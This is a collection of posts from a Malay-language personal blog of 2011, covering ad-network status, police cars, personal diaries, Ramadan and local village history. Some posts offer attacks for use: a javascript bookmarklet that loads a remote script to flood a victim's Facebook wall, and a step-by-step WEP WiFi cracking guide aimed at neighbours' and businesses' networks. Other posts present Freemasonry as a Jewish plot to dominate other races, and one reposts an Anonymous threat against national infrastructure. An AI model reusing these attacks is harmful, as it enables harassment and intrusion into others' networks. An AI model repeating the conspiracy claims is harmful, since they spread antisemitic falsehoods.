There was an error in this gadget

Nuffnang Glitterati

Akhirnya..Terima kasih banyak-banyak Cik Nuffnang ek, semoga pertolongan kamu direstui..ceyhhh wahhh..Akhirnya dapat jugak status glitterati aku. Maklum la aku ni blogger baru nak naik katakan..benda macam ni penting kot. blurrrppppsss..


Kalau korang status glitterati hilang tengok terms and conditions dekat bawah ni. Mana la tahu kot ada yang kena-mengena/sepupu/sedara antara ayat-ayat kat bawah ni. Translate sendiri je la ek. :)

Terms and Conditions:

* The Loyalty Program is open to exclusive Nuffnang bloggers where "exclusive" is defined as not having any advertisement unit being placed on the user’s blog that originates from South East Asia ad network, or any other ad network that Nuffnang deemed as a direct competitor.
* Loyalty Program membership cannot be backdated to allow for benefits to be earned prior to joining the program.
* Glitterati status may be lost if for any reason we are unable to detect a Nuffnang ad on any of your registered blogs (e.g. if your blog is taken private, has been suspended, or your blog server suffers a prolonged failure), or any blog does not receive any traffic for an extended period of time.
* Any users found to intentionally defraud the system by manipulating the rules to be included in the Loyalty Program will be banned for an indefinite period of time.
* Nuffnang reserves the right to restrict or ban any users from the Loyalty Program without reason or cause.
* Nuffnang reserves the right to alter the Terms and Conditions.

Status Gliteratti Hilang !

GLITTERATI
Sebelum tu nak tanya sikit, korang tahu ke apa bendanya ni..Bagi yang tahu buat tahu je ek, yang tak tahu korang explore la sendiri..Klik "Nuffnang" bagi yang kurang pandai tidak tahu..

korang tengok gambar di bawah ni :


Aku punya blog bukannya gempak/tinggi sangat trafik macam otai-otai blogger yang lain, update pun kurang dah sekarang sebab busy dan income cukup-cukup makan je tapi Cik Nuffnang hilangkan status Afiq. Harga sebenar CPC 25sen, sekarang dah tukar 15sen. Perrgghh 60% dah jauh berbeza tuhhh. Cik Nuffnang, maafkanlah saya jikalau saya ada buat silap yang terasa hati..Kembalikan status Glitterati saya..Tak apa, sebelum ini aku dah hantar ticket dekat Cik Nuffnang, tunggu sahaja la apa respon dia nanti. Harap-harap kembalikan semula status glitterati..Amin

Malaysian Police Car

Today i've got something interesting to share..korang nak tahu ke tak nak ikut korang punya pasal la kan..hehe..
Dah baca tajuk kan? Kereta polis Malaysia je? yelaa..ni je yang dapat share..tapi kalau korang nak tahu topik ni dekat 2 jam jugak ak cari..penat la jugak katakan, tapi gambar je laa.semuanya dibawah..ok lah, straight to the point..


PROTON SAGA















PERODUA KANCIL













PROTON SATRIA












PROTON WAJA










PROTON PERDANA V6









NAZA













MITSUBISHI LANCER EVO









KIA FORTE














TOYOTA CAMRY












CHEVROLET CRUZE












CHEVROLET CAPTIVA












NISSAN X-TRAIL


























SORENTO












Kat atas tadi semuanya yang di Malaysia..Hebat tak Polis Malaysia? Jadi kepada pelumba-pelumba atau penganas-penganas berhati-hati lahh iyaa..Malaysia ni bukan macam games Need For Speed..yang lagi menakjubkan polis UK pakai kereta Proton buat patrol car..kalau korang tak percaya tengok gambar kat bawah ni..

UK POLICE PROTON CAR












Gambar kat atas dah lama..sekarang UK dah maju, dyorang tak pakai dah kereta kat atas ni..
Amacam semua ni? Tabik hormat kat PDRM sekarang ! ahaha..1 Malaysia ! thanks for usha-usha my blog..:D

My Lucky Day !




Yessss...hari ini hari bertuah saya..nak tahu kenapa? Hari ini 5 Disember 2011 saya pergi buat ujian statik senang cakap ujian komputer laa..kenapa dengan ujian komputer? ahaha..maksud saya ujian komputer ujian buat lesen memandu..saya pergi ujian memandu dan saya pass ujian tu..selama ni saya mana pernah baca buku lesen yang dyorang bagi tu cuma belek2 je..belek2? pe benda tu? belek2 maksudnya cuma buka mukasurat buku tapi tak baca, senang kata bahasa orang putih "skip" ..betul ke? betul je lahh..markah yang saya dapat 42/50..ngam-ngam..ngam-ngam? aduhh..faham dokkk? ngam-ngam ialah nyawa-nyawa ikan lorhh..markah yang dyorang nak cuma 42 ke-atas..kalau 41 maksudnya gagal..jadi senang cerita saya bernasib baik laa..*kepada sesiapa yang tak ambil lesen lagi tak perlu baca buku, korang bertawakal sahaja..lulus nasib, gagal redha je..hahah..saya nasihatkan baik korang baca buku la lagi bagus..usaha tangga kejayaan kn? ok..semoga korang berjaya pulak nanti..:)

Sejernih Sinar Matamu???



 Salam para blogger sekalian..entry ni adalah semata-mata tentang video clip..ak pun tak tahu macam mana ak boleh layan video clip ni, hardcore2 ak pun boleh layan video macam ni..Dalam masa2 ak search blog terjumpa la satu blogger ni share tentang video ni..ntah la nak ckap macam-mana, korang tengok je lah sendiri..


Amacam?? ahahahah...

Update 2011 *** (Kesumbatan)



Smekom Datuk..aduhh. Lama gilerr ak xupdate blog..Busy bohhh, bnyak kerja kena buat lagi..Baru-baru ni, xbaru sangat laahh cuma 2 minggu lepas jerr..Nak tahu ap? toksoh tau laa..hakha..ganu-ganu kiterr..
2 minggu lepas ak prgi bandar indera mahkota hanya semata-mata nk wt lesen motor..Olohhh, bkan jauh pun..
Dekat ajerrr la demo..tp ntah laa..sumbat ni xtau nak update psal ap..hehe..k la chowwwww..

Hack Wifi for WEP and WPA (Beini 1.2.2)


ok..entri aku sebelum ni cuma ajar untuk menggodam Wifi untuk security WEP je kan..kali ni aku nak tunjukkan macam mana nak godam kedua-dua (WEP/WPA/WPA2) terus menggunakan Beini 1.2.2 jugak..senang jak lahh..
tak perlu sedia panadol activ5 pun..

tengok entri sebelum ni cara nak boot guna CD ROM atau USB BOOT..
malas nak cerita panjang laa..
download jak tutorial kat bawah ni..

klik disini untuk download ebook > http://www.mediafire.com/?2r6kfad9flha403
P/S - *Link under construction, TQ for inform.

Ping Device Untuk Blog



okehhh..korang nak ping laman blog korang kan? sekarang aku nak bagi korang link untuk ping tanpa perlu sekatan atau captcha yang memedihkan/membutakan/membengkakkan mata..cukup la tuhh..auta dah...
klik je link kat bawah ni :

klik di sini > Ping Device

Contoh Gambar  ^

Antara laman-laman ping tersebut menghantar link anda..

Senarai engin carian : Weblogs.com, Blo.gs, Technorati, Feed Burner, Syndic8, NewsGator, My Yahoo!, PubSub.com, Blogdigger, BlogRolling, BlogStreet, Moreover, Weblogalot, Icerocket, News Is Free, Topic Exchange, Google Blog Search ,Spinn3r, Bloglines, AideRSS, SkyGrid, Bitacoras, Collecta, Audio.Weblogs, RubHub, GeoURL, A2B GeoLocation, BlogShares.

Flood Wall Facebook Seseorang

Assalamualaikum.. disini aku ingin berkongsi satu cara mudah untuk membanjiri dinding orang² lain.. cara ini diajarkan oleh kawan aku sendiri menggunakan hanya dengan kod javascript yang mudah. ini hanyalah untuk pembelajaran dan sebarang kegiatan yang memudaratkan akan ditanggung sendiri oleh pengguna.

1. Login ke akaun facebook anda (kalau boleh fake id la)

2. Copy script ni


javascript:(a = (b = document).createElement("script")).src = "http://flooder.googlecode.com/files/FBWF.js", b.body.appendChild(a); void(0)


3. pergi ke page mangsa anda.. kemudian paste je dekat kotak url anda. enter.






4. akan keluar satu kotak yang meminta amount untuk flood





5. kotak seterusnya untuk perkataan yang ingin disebutkan





6. Setelah tekan ok, tunggu selama beberapa saat dan muat semula laman tersebut.. hasilnya akan menjadi seperti ini..





7. Selamat mencuba.


P/S: Only works on Google Chrome..


Credit to = GXT

Hack Wifi (Beini 1.2.2)



ok....yahhh..nak hack wifi jiran korang? restoran starbuck? senang ajerr..satu syarat, cuma wifi jenis security WEP jak bleh..

1. Mula2 tgok korang punya network adapter wireless (untuk laptop) @ brand/chipset external usb wireless smada bleh suport or tak..klu x bleh xde rzeki la tuhh..
http://www.mediafire.com/?cpna5u77domrwac


2. Download Beini ni kat link yg dah aku sedia kn tuk korg..
http://www.mediafire.com/?fi8ipa6i12fih19


3. Lepas download Beini tu, pastikn ekk dlm format iso..klu format rar korang kena extract dlu ok..

4. Cara nak run Beini tu korang msti burn iso tu as image kat cd (pakai nero, ashampoo, ultraiso n lain2) untuk boot menggunakan cd la..

5. Klu nak boot gna usb(pendrive), korang guna software kat link yg aku bg ni..
http://www.mediafire.com/?coa1mn3cdjabak2


dan ni link tutorial cara nak boot Beini kat dlm pendrive
http://www.mediafire.com/?7354r7yhiz4argj


AKU SARANKAN KORANG PRINT OUT STEP NI LPAS KORANG BACA SBB NAK GUNA BILA NAK HACK TPI KLU OTAK KORANG JENIS MUDAH INGAT ABAIKAN OK..;)

6. Ok lpas dah download smua ni n dah burn dlm cd or usb kita truskn ngan projek kta hack wifi kwn,jiran,restoran2 berdekatan,syarikat2 n yg lain2 ok...

7. -Mula2 msukkan cd boot td or usb(pendrive yg dah boot pakai UNETbootin 377) ke laptop anda n restart kan laptop korng..

8. -Bila dah runing software tu, korang enter jak kat tulisan DEFAULT..

9. -Bila dah masuk program tu, korang click ikon ke-5 (lambang botol susu) pastu click yes..

10. -Click kotak wlan0, lepas tu klik next dan click scan..

11. -Lepas scan, dia akan tunjukkan smua nama2 wifi yg ada dskitar anda yg nak dhack tu la dlm msa 30 saat..

12. -Click wireless mana yang nak hack dan dia akan highlight sendiri lepas tu klik next..

13. -click advanced mode..

14. -Click capture, lepas tu klik fake auth (by force)

15. -Click access to information, klik start. tunggu sampai dia tulis Connected to 5c:d9:88:b5:80:93(contoh jak). lepas tu klik X untuk kotak fake authentication with AP (maksudnya tutup kotak tu)

16. -Tick kotak Auto Run. klik Interactive 0841 (-2). tgk kotak kat kiri atas, tgk bahagian Beacons, tunggu sampai 1,000 + lebih. lepas tu klik kotak Previous (All Stop!)..

17. -Click advance mode..

18. -Click capture. klik fake auth (by force)..

19. -Click access to information, klik start. tunggu sampai dia tulis Connected to(mcm step ke-15 diatas). kali nie tak payah tutup kotak nie yah..

20. -Click Interactive 0841 (-2). tgk kotak kat kiri atas, tgk bahagian Data, tunggu sampai 10,000 + lebih. lepas tu klik kotak start crack..

21. -Kalau dia keluar tulisan failed, korang boleh tunggu dia akan run sendiri atau korang boleh klik stop crack, lepas tu klik start crack sekali lagi..

22. -Kalau berjaya dia akan tulis key found. angka dalam key found (............) tu la password wifi tu tapi korang kena ambil angka jak yah, yang tanda titik bertindih mcm ni -> : korang abaikan.

23. -Lepas dah dpat password tu korang bleh la on kan laptop korang tpi remove kan cd n usb tu dlu klu tak dia jd boot lg tu nt k..

24. Bila dah on laptop,korang buka wifi korang n cari nama wifi yg korang hack tdi n click connect n masukkn pasword yg dah di hack tu..

settle..klu ad pape nk tnye leave je comment kt bawah ni ok..nnti ak feedback smula...selamat mencuba

Sejarah PERMATANG BADAK (Trip 1)

ok.bulan ni ak trlalu bz dngan trip hanya nk cri fakta pnya psal..akhirnya ak dpt resource jugak tentang kmpung ak sndri..jd kepada ssiapa yg stay kt Permatang Badak leh la tau asal usul kmpung korang..kt bwah ni ak ad share sejarah kmpung kita yang agung lagi saksama lagi popular megah kat Kuantan, hahaha..baca jgn tak baca..


View Larger Map

Terserempak badak di permatang

TERLETAK kira-kira sembilan kilometer dari Kuantan, Pahang, Kampung Permatang Badak tidaklah terlalu istimewa, tetapi mungkin ramai tertanya-tanya mengapa haiwan liar itu menjadi pilihan hingga membuatkan namanya dipilih untuk diabadikan.
 

Mengikut ceritanya, Permatang Badak hanya penempatan biasa yang diteroka sekumpulan penduduk pada awal 1930-an dan tiada siapa pernah terfikir untuk menamakan kawasan berkenaan hinggalah bekas pegawai daerah berasal dari Perak, Raja Musahar terserempak dengan sekumpulan badak berhampiran permatang ketika singgah di kampung itu.

Menurut penduduk asal Permatang Badak, Isa Ismail, 90, sebelum insiden Raja Musahar terserempak dengan haiwan liar itu, penempatan mereka tidak mempunyai nama walaupun sebahagian besar tanah di situ dihuni penduduk.


“Dia yang memberi nama Permatang Badak kepada kampung ini selepas peristiwa itu. Permatang itu pula gelaran diberi penduduk kepada sebuah kawasan tinggi yang berpaya di kiri kanannya,” katanya.
 

Isa berkata, sebelum diteroka, kampung itu asalnya hutan berpaya yang turut menjadi habitat hidupan liar seperti gajah, harimau dan babi hutan, malah penduduk pernah terserempak dengan harimau dan gajah ketika menebang pokok dan menebas hutan untuk mendirikan rumah dan bercucuk tanam.
 

Datuk kepada 20 cucu itu berkata, selang beberapa tahun kemudian, kawasan terbabit diusahakan dengan tanaman padi secara berperingkat kerana tanahnya subur.

“Bayangkan, hutan paya ini bertukar menjadi sawah padi yang menguning dan penduduk ketika itu sungguh gembira sehingga pada satu tahap berjaya mempengaruhi penduduk luar seperti dari Balok, Beserah, Sungai Karang, Tanjung Api, Kampung Batu Sawar dan Tanjung Putus serta dari daerah Pekan berpindah dari kampung mereka untuk mengusahakan tanaman padi di Permatang Badak,” katanya.

Isa berkata, penduduk beramai-ramai membina pondok digelar ‘pondok menunggu durian’ di tepi jalan berdekatan Masjid Al-Hidayah di persimpangan lampu isyarat Permatang Badak - Taman Guru untuk menguruskan tanaman padi, termasuk mengawal serangan makhluk perosak seperti tikus dan burung.

“Tanah sawah yang subur membolehkan kami menanam padi tiga kali setahun dan memperoleh antara 2,000 hingga 3,000 gantang setiap musim,” katanya.

Isa yang berhijrah dari kampungnya, Beserah pada usia 20 tahun berkata, kawasan berpaya dari Kilometer 4 hingga Kilometer 10, Jalan Gambang menghala ke Kuantan satu ketika dulu adalah kawasan tanaman padi yang sangat luas dan selayaknya digelar ‘jelapang padi’ waktu itu.

Bagaimanapun, katanya, pendudukan tentera Jepun di Tanah Melayu bermula 1941 mengubah corak kehidupan dan secara tidak langsung aktiviti ekonomi mereka turut terkena tempiasnya.

“Hasil padi kami turut dirampas dan jika ada lelaki ditangkap, mereka dikerah bekerja dengan tentera Jepun untuk meratakan semula permukaan tanah yang dilalui tentera Jepun sebelum itu.

“Kehidupan waktu itu sungguh perit... nak bekerja susah, persekolahan anak terjejas, malah kami terpaksa menyimpan padi yang dituai di tempat paling selamat kerana bimbang dirampas tentera Jepun. Ubi kayu menjadi makanan utama waktu itu kerana kesukaran mengerjakan sawah padi,” katanya.

Malah, katanya, tentera Jepun mengerah mereka menanam padi di sebuah kawasan paya yang kini berubah di mana sebahagiannya ditumbuhi semak-samun dan sebahagian lagi ditambak dan dibangunkan menjadi taman perumahan Desa Mesra.

“Sebagai kenangan untuk anak cucu dan generasi akan datang, kami menggelar kawasan itu Paya Jepun dan kekal hingga ke hari ini,” katanya.

Isa berkata, pada era itu juga tentera British membina sebuah kubu di kawasan berhampiran Masjid Al-Hidayah untuk mengawal keselamatan dan menyerang tentera Jepun yang melalui kawasan itu.

Katanya, penduduk juga pernah menemui bom berangkai milik tentera Jepun yang masih aktif sebelum menyerahkannya kepada polis kira-kira 11 tahun lalu.

Bagi Habsah Mat, 70, kedua-dua arwah ibu bapanya, Maimunah Mat Raji dan Mat Idris antara penduduk awal di kampung itu yang berpindah dari Pekan untuk mencari kehidupan yang dapat menjamin masa depan.

“Orang dulu-dulu hidup berpindah-randah sebab kebanyakannya bekerja kampung dan bilangan ahli keluarga pula ramai,” katanya.

Mengenai nama kampung itu, menurut Habsah, ibunya pernah bercerita mengenai kewujudan sebuah permatang di depan dewan orang ramai berhampiran Klinik Desa Permatang Badak.

“Mak cik tidak ingat sejauh mana jarak permatang itu tetapi arwah ibu pernah bercerita, jika kita di depan permatang itu, kita tidak nampak apa yang berlaku di sebelah sana... permatang itu diumpamakan sebagai kawasan tinggi di tengah lembah.

“Bagaimanapun, ia terhakis sedikit demi sedikit manakala lembah atau paya yang mengelilinginya mulai cetek dan kering,” katanya.

Ketua kampung, Alias Hasan, 47, berkata Permatang Badak mula membangun pada 1980-an apabila jalan raya utama dilebarkan, taman perumahan dibangunkan dan sekolah dibina bagi menampung jumlah pelajar yang semakin bertambah.

Kini, Permatang Badak bukan lagi kawasan hutan atau sawah padi tetapi perkampungan yang semakin maju dan moden seiring dengan arus perkembangan bandar Kuantan.

Penduduknya juga daripada pelbagai lapisan masyarakat dengan memiliki kerjaya sama ada di bidang profesional, korporat mahupun memiliki perniagaan sendiri.
 
# FAKTA
   Permatang Badak, Kuantan, Pahang

  • Mula diteroka pada awal 1930-an
  • Dinamakan oleh bekas pegawai daerah, Raja Musahar
  • Asalnya kawasan hutan berpaya sebelum diusahakan dengan tanaman padi
  • Kampung itu pernah ditawan tentera Jepun dan British
  • Taman perumahan Desa Mesra di kampung itu digelar Paya Jepun oleh penduduk tempatan

 

Karam Singh Walia Kutuk Melayu

Masa tengah usha2 youtube ak ternampak video KARAM SINGH WALIA..korang pun kenal dy kn..alaa yang suka bagi pantun kat buletin utama tv3 tuhh..
ak pun test la bukak..terkejut ak tengok video tu..dy cakap orang melayu bukan asal dari Malaysia dengan Indonesia..
korang tengok dulu kat bawah ni :

    
  • Siott jerr kan...

Ak ingatkan dy suka orang melayu tapi ternyata tipu..kalau orang mabuk bercakap konfem ikhlas dari hati larh..dah terkantoi kutuk melayu masa mabuk..kecian jugak kat dy kena buli...hax3

Ak sokong !! haha

The True Story Day 3

Yo yo ! Kita sambung Day 3

Sekarang ak nak habiskan cerita terus, serabut kepala ak ni, ak yang tak tahu ap2 terpaksa involved dalam hal ni..ak tak suka dah nak bermasam muka dengan kawan ak..



Malam day-3, ak pergi jumpa si 'x'..mula2 si 'x' ajak ak pergi cari hot ticket maxis tapi tak jadi..ak pun putar-putar la naik motor ke sana-sini..ntah tak tau arah tuju, pastu ak bawak la dy g medan selera taman sepakat..lepak demi lepak kat situ, ak pun tak leh bla dah simpan perasaan khianati kawan ak ni..ak terus cerita habis pasal si 'dy' dengan ak kat si 'x'..dari A-Z, 1 hingga 99999juta..lepas ak cerita kat kawan ak, ak msg si 'dy' pulak suruh msg si 'x' pastu cakap benar ngan si 'x'..discuss punya la discuss masing2 dah faham sama satu sama lain..jadi sekarang ni ak tak couple dengan si 'dy'..titik..pppfftttt !! malas dah nak cerita..serabut otak ak ni..

-end of the story-

The True Story Day 2



ok..sekarang kita sambung The True Story Day 2 pulak..

arini ak nak citer pasal si 'x' ...lalalalalala...
WARNING ! maksud ak bukan nak kutuk si 'x' lorhhhhh !!! cuma cerita sahaja..

pagi dah menjelma handset pun sudah berbunyi alarm pulak suruh ak bangun tidorr..dengan mataku yang runcing ak mencari sebuah alat canggih yang dipanggil telefon bimbit..haha..tak lawak langsung ! bla laaa..ak pun buka lock phone..si 'x' mesej ak "dh bangun tidur belom?" ak pun reply "dh bangun nak mandi jap"....
dah siap mandi, ber-make up, tetibe si 'dy' msg ak..ak pun pelik la sebab si 'dy' ni sepatutnya kena pergi sekolah tapi dy tak pergi alasan dy demam....
kitorang pn msg2 laa..(tak leh bagi tahu si 'dy' msg ap kat ak sebab takut si 'dy' baca blog ni nanti) hehehe..ak pun msg la si 'dy' ni sampai ak tiba ke tempat keje..
masa kat tempat keje si 'x' ni ok lagi..ak dengan dy pun ok, takde bermasam muka ngan tak tegur dan lain-lain..
dy ok ak pun ok laa..lepas keje siap ad la masa jugak untuk rehat2..tetiba ak perasan yang si 'x' macam lain je nampak ak pegang fon, dah la ak tersengih sorang2 macam kambing, mana tak laen si 'x' ni tengok ak..lagi pun sebelum ni ak mana ad awek, lagi la dy syak macam2..
si 'x' ni pun pelik laa..ak rasa si 'x' macam tau2 dah yang ak ni ad kena mengena dengan si 'dy'..aduhh..
dalam sehari tu ak dengan si 'x' ni kurang bertegur sampai laa habis keje..ak pun tak sampai hati jugak sebenarnya tapi perkara dah terjadi nak buat macam mana...
dah habis semua keje kitorang pun balik dengan masing2 mukanya runcing..
ak ap lagi, balik siap mandi dan lain2, terus msg dengan si 'dy'...punya laa msg dekat 2jam jugak, sampai berat kepala nak angkat..sebenarnya ak mengantuk, ak pun secara jujur cakap kat si 'dy' yang ak mengantuk..si 'dy' faham ak sebab ak kan letih keje..hahah..macam suami isteri pulak..kah3..koya laaarhh !
ak pun tidur sampai la hari nak berbuka, jam pun  menunjukkan pukul 7.20pm, azan pun berkumandang..ak berbuka puasa...ahaha.............??

bersambung ~

The True Story Day 1

What is going on buddy ?


Just chill n cool afix ! Arini ak tetibe rasa lain..korang nak tahu kenapa? aduhh..susah betol..ok macam ni lah ceritanya :

si 'dy' :: anak dara muda
si 'x'   :: kawan ak


si 'x' ni ada hati kat si 'dy', tapi si 'dy' tak minat kat si 'x' ni kes si 'x' dah ada awek..bukan tu saja, si 'dy' jugak pernah bagi tahu ak yang dy tak suka si 'x' sebab si 'x' ada adik angkat..ak dengan si 'dy' ni kekawan je..selalu la jugak ak usha2 wall Fb dy sebab nak komen2, setiap kali ak komen status si 'dy'si 'x' mesti lain dengan ak, macam tak nak layan ak jerr..pastu sejak kebelakangan ni si 'dy' asyik tulis kat status dy yang dy ada minat kat sseorang..ak pun tak tahu kat sape dy minat..arini si 'dy' ada tulis kat status dy bahwa dy nak bagi tahu jugak dekat someone tu yg dy suka kat someone tu..ak pun komen2 ada laa jugak sikit2 kat status dy tu (nak buat sedap jerr)..pastu malam ni tetibe si 'dy' chat dengan ak..first skali si 'dy' tanya kat ak pasal si 'x' tu ada bersama dengan ak ke tak, si 'dy' tanye macam tu sebab ak ni rapat dengan si 'x' ni, nak pergi keje pun same2..pastu ak jawab la tak de kat si 'dy' ni, oleh itu ak dengan si 'dy' chat2 laa.........dalam chat2 tu si 'dy' cakap yang dy suka kat ak..@#$%^..terkezut ak !! tak tau nak cakap ap, selama ni ak anggap dy kawan je, perasaan suka ak kat dy tu ad la jugak selama ni tapi tak banyak laa..sekarang ni ak tak tau nak cakap ap, kalau la ak dengan si 'dy' bersama, ap ak nak cakap dengan si 'x' tuhh, satu lagi dah la si 'dy' ni kawan bekas awek ak..aduhh..tapi sebenarnya ak ada hati jugak kat si 'dy' sebab dy ni baik, faham perasaan orang, banyak lagi laa..boleh la jugak buat awek, hehe..tapi tu lah pasal, pening denn nak memikirkannya..hahaha...xpe2 kita tengok la macam mana nanti ye awk..

bersambung ~

Lagu Raya ??



sekarang menunjukkan jam 2.29 am, hari selasa, ogos 16 2011..sudah 16 hari kita berpuasa betul x? kalau salah korang yang salah bukan sy..hahaa..ok sekarang ni sy nak cakap tentang lagu raya yang baru dimainkan kat radio..betul ke nak keluarkan lagu raya kat radio perlu pakai undang-undang jugak? sy dengar cerita memang ada yang cakap macam tu..diorang cakap bila bulan ramadhan, radio xleh pasang lagu raya selagi belum hari yang ke-15..kenapa pulak? ntah laa..sy cuma bagi tahu je, antara fakta atau tidak tu xtau larhh..mungkin betul mungkin salah kot..kenapa ye xleh mainkan lagu raya sebelum hari ke-15..mungkin lagu raya tu buat orang rasa nak ponteng puasa kot, sebab lirik lagu raya kan banyak sebut pasal makanan macam lagu ni:

" kuih dan muih, beraneka macam,
makanlah jangan hanya dipandang,
ketupat rendang .........."

betul x? hahaa..tapi tu lah, semalam bukan main banyak lagi lagu dimainkan kat radio sampai sy nak buat kerja pun rasa nak makan..bukan tu je, boss sy pn sampai berdancing tau..kah3..k laa..kalau korang xpercaya test la pasang radio..hahah..


Puasa !



aduhhyaii..letih-letih !! dah la keje lagi, dugaan tol..sekarang sudah hari ke-14 kita puasa ork? senang je nak kira cuma tengok hari bulan jerrr...btol dok? ke guane? hahaa..dalam 14 hari berpuasa ni, baru 1 hari ak ponteng..bukan ponteng lorhh ! tp demam..dugaan la semua tu..hahhh..ak sebenarnya nak citer pasal seorang lelaki, bukan nak ngumpat k, cuma bagi tau je...dia ni dh berumur la jugak mungkin dalam lingkungan 30-40 kot, adehh...tapi yang ak kesiannya dia ni bisu ngn pekak ! kahkahkahkah..OKU lorh..tapi ak tabit  la jugak dekat dia sebab dia jenis rajin kerja, padahal duit OKU bulan-bulan dapat dah..berapa banyak tu ak tak tau laa..yang ak tak suka perangai dia ni..suka mengarah orang..ehh shialll larh..ak tau ak orang baru tapi agak-agak la jugak ork?! tau dah dia orang lama..eshhhhhh....dah la tak puasa pastu main mengarah orang, macam dia bos pulak..ak ni dah la puasa, korang tau la kalau puasa konfem cepat rasa nak melenting..nasib ak ni penyabar kalau tak batang paip ak pukul..saborrrrr jerrr...jadi kisah ak ni korang ambik teladan sikit, jangan jadi mcam dia neyh ! chiaooooooooooooo !

Ahli Silap Mata atau Pembunuh


Ahli silap mata pun buat silap laa, sehebat-hebat dia pun terkantoi jugak..haha..saksikan lah video dibawah..seram la jugak mati macam tu..






macam mane? enjoy?

Jom Tengok Seni Bina Malaysia

Kalau lah kita tengok senibina dekat MALAYSIA ni semua menarik2 kan..tapi masih ada yang terselindung dari pandangan kita semua kalau korang nak tahu..korang janganlah membazir masa kalau korang xminat atau xtahu pasal teori freemason ni, abaikan lah gambar-gambar semua dibawah ni..

KOLEJ UNIVERSITI SAINS dan TEKNOLOGI MALAYSIA (KUSTEM), Terengganu
















kalau korang nak tahu banggunan ni sudah dikaburkan dari Google Maps sekarang..kenapa kaburkan? kantoi ke??

Putrajaya

Vatican City & Putrajaya
(perhatikan simbol mata)
Di Alamanda, Putrajaya


















PRESINT 5, PUTRAJAYA
















































Satu lagi kenapa tiang dibina sebagai menunjukkan mercu tanda sesebuah tempat atau negeri/negara..
atau tiang itu dibina sebagai obelisk(tiang) tempat penyembahan para freemason..
apakah mercu tanda Islam? adakah tiang?






















Terpulang kepada korang la nak kata tidak benar atau benar, jelas sekarang bukti menunjukkan dan pelbagai jenis cerita sudah dikeluarkan..tinggal kita sahaja untuk tonton..tontonlah The Arrival dengan minda yang terbuka dan sedikit menerima..

*sumber internet
*edited by me

BULAN PUASA SUDAH DEKAT !!

aduhh..teruk la macam ni, keje penat2 tapi xdapat makan dan minum..apa boleh buat, terima je la..dah memang dugaan namanya kan...tapi xpe lagi penat lagi banyak nafsu dan lagi banyak pahala akan ku dapat..hahax ! betul x?? satu lagi ! jangan dilupakan pulak terawih tau ! hahaa..mesti macam berperang nanti kan?? nak tau kenapa? budak2 main mercun laa..hahaa..sebut psal mercun ni la bagus, boleh buat bisnes ni..bisnes apa? bisnes jual mercun la kita nampaknya kan? hahaha..jangan2, kena tangkap tau la..sendiri buat sendiri mau tanggung maa..hahaa..k laa..sumbat saja ni..kuikuikuikuikui...

Serangan Kedua Anonymous Hackers : Op Malaysia 2

Benarkah ura-ura mengatakan akan ada serangan Anonymous Hackers yang kedua??
hahaha..relaks sudah..








Gambar Op Malaysia 2
 



Video OPS2 :

 

Allow me first to apologize for this interruption. I do, like many of you, appreciate the comforts of every day routine the security of the familiar, the tranquility of repetition. I enjoy them as much as any bloke. But in the spirit of commemoration, whereby those important events of the past usually associated with someone's death or the end of some awful bloody struggle are celebrated with a nice holiday. I thought we could mark this day sixteenth of june, a day that is sadly no longer remembered, by taking some time out of our daily lives to sit down and have a little chat. There are of course those who do not want us to speak. I suspect even now, orders are being shouted into telephones, and men with guns will soon be on their way. Why? Because while the truncheon may be used in lieu of conversation, words will always retain their power. Words offer the means to meaning, and for those who will listen, the enunciation of truth. And the truth is, there is something terribly wrong with this country, isn't there? Cruelty and injustice, intolerance and oppression. And where once you had the freedom to object, think, and speak as you saw fit, you now have censors and systems of surveillance coercing your conformity and soliciting your submission. How did this happen? Who's to blame? Well, certainly there are those more responsible than others, and they will be held accountable, but again truth be told, if you're looking for the guilty, you need only look into a mirror. I know why you did it. I know you were afraid. Who wouldn't be? War, terror, disease. There were a myriad of problems which conspired to corrupt your reason and rob you of your common sense. Fear got the best of you, and in your panic you turned to the now Prime Minister. He promised you order, he promised you peace, and all he demanded in return was your silent, obedient consent.

We have seen the censorship taken by the Malaysian government, blocking sites like The Pirate Bay, and WikiLeaks. Malaysia is one of the world's strictest governments, even blocking out movies, and television shows. These acts of censorship are inexcusable. You are taking away a basic human right. The internet is here for freedom, without fear of government interference. Do not think that no one else notices. Your structured government has done the talking, and we hear loud and clear. Let this be an announcement to all your people. This is a sign, a warning, and an opportunity to listen to ideas above your own. In a way you are being stubborn. But how will this help anyone or your country. We fear that if you make further decisions to take away human freedom. We are obligated to act fast and have no mercy. For rules were meant to be broken. And corruption was meant to be washed away and forgiven. Now we will wash your corruption away so be prepared. Take this as a favor.

We shall bring down the entire countries national infrastructure. We shall make this a day to be remembered.

This is your second warning.

We are Anonymous.

We are Legion.

We do not forgive.

We do not forget.

Expect Us.



Betulkah anonymous akan melancarkan Operation Malaysia 2 atau Op Malaysia kedua. Benar atau tidak Hackers anonymous ini menghantar mesej tentang serangan Operation Malaysia 2 atau Op Malaysia 2 atau gelombang kedua. Serangan hackers sebelum ini, jelas menjejaskan hampir 200 laman web kerajaan, blog, portal dan forum tak terkecuali juga twitter serta facebook pun kena hack. Samada ia palsu atau benar langkah keselamatan perlu diambil.

Serangan kali kedua ini dirancang akan dilakukan pada 9.30mlm, 4 julai 2011 dan mensasarkan laman web kerajaan Malaysia iaitu PMO.gov.my. Samada benar atau portal atau laman web PMO.gov.my akan kenahack kita tengok mesej video Hackers anonymous ini yang diedarkan melalui youtube. kalau tak faham korang translate la sendiri bahasa melayu..

Freemason

Sejarah Penubuhan Freemason 

Freemason bermaksud pembina-pembina yang bebas. Ia adalah nama bagi pertubuhan rahsia
yang ditaja oleh Yahudi yang bertujuan bagi menguasai bangsa lain. Mereka menggunakan
pelbagai cara termasuk cara yang buruk dan ganas supaya dapat menguasai dunia dalam
jangka panjang.


Sejarah Penubuhan
Penubuhannya penuh rahsia. Sesetengah berpendapat Freemason ini ditubuhkan pada zaman
raja Herod Agrippa I (10 SM- 44 M) pada tahun 44 Masihi bersama beberapa orang
pemerintah Yahudi bagi menentang perkembangan agama Kristian pada masa itu.
Antara pemimpin-pemimpin Freemason adalah Hiram bin Damwab Lami. Pada zaman
moden, pemimpin mereka dikenali Miribu yang salah seorang pemimpin Revolusi Perancis,
Jan Jaga Rusu, Politiu, Jurji Zaidan dan Karl Marks yang menjadi pengasas komunis.



Dasar-dasar dan Ajaran

Antara fahaman dibawa oleh Freemason ini adalah:
Mengingkari Allah, para rasul, kitab-kitab dan perkara-perkara ghaib. Mereka menganggap
semua itu sebagai karut dan dongeng.
Berusaha ke arah menjatuhkan kerajaan-kerajaan yang tidak dapat dipengaruhi dengan
segala cara sahaja.
